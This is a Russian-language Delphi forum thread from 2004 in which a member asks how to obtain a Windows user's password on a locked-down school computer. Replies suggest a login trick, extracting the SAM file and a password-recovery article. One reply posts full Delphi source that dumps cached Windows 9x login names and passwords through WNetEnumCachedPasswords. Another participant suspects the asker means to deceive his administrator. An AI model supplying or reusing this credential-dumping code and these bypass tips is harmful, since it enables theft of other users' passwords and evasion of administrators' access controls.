Модераторы: Poseidon, Snowy, bems, MetalFan
  

Поиск:

Ответ в темуСоздание новой темы Создание опроса
> Быситрое изъятие пароля, средствами Delphi в сложной обстановке 
:(
    Опции темы
Pakshin A. S.
  Дата 19.2.2004, 22:49 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Эксперт
****


Профиль
Группа: Участник Клуба
Сообщений: 5056
Регистрация: 16.2.2003

Репутация: 21
Всего: 61



Требуется, зная имя пользователя Windows'а узнать его пароль! biggrin.gif
Windows закрыть почти со всех сторон (даже панель управления недоступна!); открыт только диск с системой для чтения и диск для учеников. Реестр закрыт, дисковод не работает!

Можно подбором, но это очень долго. Может алгоритм есть какой-то или что-то прочитать надо, или ещё что-то...

Помогите, пожалуйстаbiggrin.gif
PM   Вверх
Mal Hack
Дата 19.2.2004, 22:56 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Мудрый...
****


Профиль
Группа: Участник Клуба
Сообщений: 9926
Регистрация: 15.2.2004

Репутация: нет
Всего: 261



Login: Administartor (логин должен быть админа)
Pass: 7777
<Enter>
Далее выскочет фигная - доступа нет.
Нажимаешь Ентер, затем очищаешь поле пароля и опять Ентер.
Если опять вылезет та фигня, то фишка не пройдет.
Фишку можно пробовать на НТях (2000 и остальные) без какого-то СП (какого не помню).
ЗЫ: Может быть надо через safe mode.
Из самой винды пароль не вынуть, т.к. он зашифрован и обратно - никак...
Правда, можно попробоват вариант - из под NTFS DoS достать какой-то SAM файл...И с ним поработать...
Через Делфи - никак, там как САМ файлы защищены от доступа любого ПО.

Это сообщение отредактировал(а) Mal Hack - 19.2.2004, 22:57
PM ICQ   Вверх
oleg1973
Дата 19.2.2004, 22:58 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


asm fanat
****


Профиль
Группа: Экс. модератор
Сообщений: 3283
Регистрация: 16.7.2003
Где: Italy

Репутация: 1
Всего: 34



Pakshin A. S.
инет есть?smile.gif))


--------------------
SST 465555
icq 200-512-712
PM MAIL WWW ICQ   Вверх
Pakshin A. S.
Дата 19.2.2004, 22:58 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Эксперт
****


Профиль
Группа: Участник Клуба
Сообщений: 5056
Регистрация: 16.2.2003

Репутация: 21
Всего: 61



А ведь есть программы по взлому пароля?!
PM   Вверх
Pakshin A. S.
Дата 19.2.2004, 22:59 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Эксперт
****


Профиль
Группа: Участник Клуба
Сообщений: 5056
Регистрация: 16.2.2003

Репутация: 21
Всего: 61



Цитата(oleg1973 @ 19.2.2004, 23:58)
Pakshin A. S.
инет есть?smile.gif))

Не понял... (sorry не знаю понятия)
PM   Вверх
Victor
Дата 19.2.2004, 23:16 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Бывалый
*


Профиль
Группа: Участник
Сообщений: 225
Регистрация: 29.10.2003

Репутация: нет
Всего: нет



ИНТЕРНЕТ ЕСТЬ? =)
PM MAIL   Вверх
Cashey
Дата 19.2.2004, 23:29 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Бессмертный
****


Профиль
Группа: Завсегдатай
Сообщений: 3441
Регистрация: 13.11.2002
Где: в столице

Репутация: 2
Всего: 60



Цитата(Victor @ 19.2.2004, 23:16)
ИНТЕРНЕТ ЕСТЬ? =)

а как он тогда на форум выходит? И вообще-то наш друг Pakshin A. S. не иначе хочет своего Админа обмануть, не хорошо smile.gif


--------------------
библия учит любить ближнего, а камасутра обучает как именно
PM Jabber   Вверх
oleg1973
Дата 20.2.2004, 02:35 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


asm fanat
****


Профиль
Группа: Экс. модератор
Сообщений: 3283
Регистрация: 16.7.2003
Где: Italy

Репутация: 1
Всего: 34



ну если есть инет то можна а загрузить на комп ченить



--------------------
SST 465555
icq 200-512-712
PM MAIL WWW ICQ   Вверх
Chingachguk
Дата 20.2.2004, 05:55 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Эксперт
***


Профиль
Группа: Участник Клуба
Сообщений: 1232
Регистрация: 25.3.2002
Где: Москва

Репутация: нет
Всего: 18



На bugtraq.ru есть статья, полностью описывающая все возможности "добраться" до пароля в xp (не через "инет").


--------------------
I don't like the drugs (but the drugs like me). M.Manson.
PM MAIL ICQ   Вверх
Pakshin A. S.
Дата 20.2.2004, 18:57 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Эксперт
****


Профиль
Группа: Участник Клуба
Сообщений: 5056
Регистрация: 16.2.2003

Репутация: 21
Всего: 61



А где точнее? какой раздел?
PM   Вверх
Cheba
Дата 21.2.2004, 11:05 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


pointless one
***


Профиль
Группа: Vingrad developer
Сообщений: 1777
Регистрация: 27.11.2003
Где: /dev/null

Репутация: 1
Всего: 62



Это на bugtraq.ru: Теория и практика аудита и восстановления паролей Windows NT/2000/XP

А это для 9Х:
Код
unit Unit1;

interface

uses
 Windows, SysUtils, Classes, Forms, ShellAPI, Controls, StdCtrls;

type
   TForm1 = class(TForm)
   GroupBox1: TGroupBox;
   ListBox: TListBox;
   Label1: TLabel;
   Label2: TLabel;
   procedure Label1Click(Sender: TObject);
   procedure FormShow(Sender: TObject);
 private
   { Private declarations }
 public
   { Public declarations }
   hMPR: THandle;
end;

// Отсюда мы можем заключить что должно валяться на форме,
// надеюсь вы сами всё закидаете, а если нет, то вам дорога в хелпы.

var
 Form1: TForm1;

const
 Count: Integer = 0;

function WNetEnumCachedPasswords(lp: lpStr; w: Word; b: Byte;
PC: PChar; dw: DWord): Word; stdcall;

implementation
{$R *.DFM}

function WNetEnumCachedPasswords(lp: lpStr; w: Word; b: Byte;
PC: PChar; dw: DWord): Word; external mpr name 'WNetEnumCachedPasswords';

// Объявляем функцию внешней, надеюсь вы поняли
// каким макаром, или вам опять в хелпы

type
 PWinPassword = ^TWinPassword;
 TWinPassword = record
 EntrySize: Word;
 ResourceSize: Word;
 PasswordSize: Word;
 EntryIndex: Byte;
 EntryType: Byte;
 PasswordC: Char;
end;

// Объявляем все типы, которые будем юзать в проге.

var
 WinPassword: TWinPassword;

// Собственно переменные :-)

function AddPassword(WinPassword: PWinPassword; dw: DWord): LongBool; stdcall;
var
 Password: string;
 PC: array[0..$FF] of Char;
begin
 inc(Count);
 // Увеличиваем число паролей на 1
 Move(WinPassword.PasswordC, PC, WinPassword.ResourceSize);
 // Получаем в PC пароль
 PC[WinPassword.ResourceSize] := #0;
 CharToOem(PC, PC);
 Password := StrPas(PC);
 // После недолгих преобразований в Password имеем кэшированный логин
 Move(WinPassword.PasswordC, PC, WinPassword.PasswordSize + WinPassword.ResourceSize);
 Move(PC[WinPassword.ResourceSize], PC, WinPassword.PasswordSize);
 PC[WinPassword.PasswordSize] := #0;< BR> CharToOem(PC, PC);
 // Теперь в PC имеем пароль
 Password := Password + ': ' + StrPas(PC);
 // Разделяем логин и пароль двуеточием...
 Form1.ListBox.Items.Add(Password);
 // ...и добавляем в ListBox на форме
 Result := True;
 // Возвращаемся с положительным результатом
end;

procedure TForm1.Label1Click(Sender: TObject);
begin
 // при нажатии на лэйбл открываем окошко ие с нашим любимым сайтом :-)
 ShellExecute(GetDesktopWindow, 'open', 'http://www.lamerov.net', nil, nil, 0);
end;

procedure TForm1.FormShow(Sender: TObject);
begin
 // А теперь сама процедура заполнения всех паролей.
 if WNetEnumCachedPasswords(nil, 0, $FF, @AddPassword, 0) <> 0 then
 // Если не найден кэшированый пароль, то
 begin
   Application.MessageBox('Can''t load passwords: User is not logon.',
   'Error', mb_Ok or mb_IconWarning);
   Application.Terminate;
   // Выдаем сообщение об этом
 end
 // иначе,
 else
 if Count = 0 then
   // если паролей всего 0 то тоже об этом сообщаем
   ListBox.Items.Add('No passwords found...');
end;

end.
Это все берет кэшированные пароли из 9x винды, а также из винды, где в установленном виде есть ИЕ 5 (хотя может и 4-ого хватитsmile.gif)
Если интересно, всю работу делает WNetEnumCachedPasswords.
PM MAIL ICQ   Вверх
Pakshin A. S.
Дата 21.2.2004, 19:12 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Эксперт
****


Профиль
Группа: Участник Клуба
Сообщений: 5056
Регистрация: 16.2.2003

Репутация: 21
Всего: 61



Спасибо, буду разбираться! biggrin.gif

Это сообщение отредактировал(а) Pakshin A. S. - 21.2.2004, 19:13
PM   Вверх
  
Ответ в темуСоздание новой темы Создание опроса
Правила форума "Delphi: Общие вопросы"
SnowyMetalFan
bemsPoseidon
Rrader

Запрещается!

1. Публиковать ссылки на вскрытые компоненты

2. Обсуждать взлом компонентов и делиться вскрытыми компонентами

  • Литературу по Дельфи обсуждаем здесь
  • Действия модераторов можно обсудить здесь
  • С просьбами о написании курсовой, реферата и т.п. обращаться сюда
  • Вопросы по реализации алгоритмов рассматриваются здесь
  • 90% ответов на свои вопросы можно найти в DRKB (Delphi Russian Knowledge Base) - крупнейшем в рунете сборнике материалов по Дельфи


Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, Snowy, MetalFan, bems, Poseidon, Rrader.

 
0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема | Delphi: Общие вопросы | Следующая тема »


 




[ Время генерации скрипта: 0.1494 ]   [ Использовано запросов: 22 ]   [ GZIP включён ]


Реклама на сайте     Информационное спонсорство

 
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности     Powered by Invision Power Board(R) 1.3 © 2003  IPS, Inc.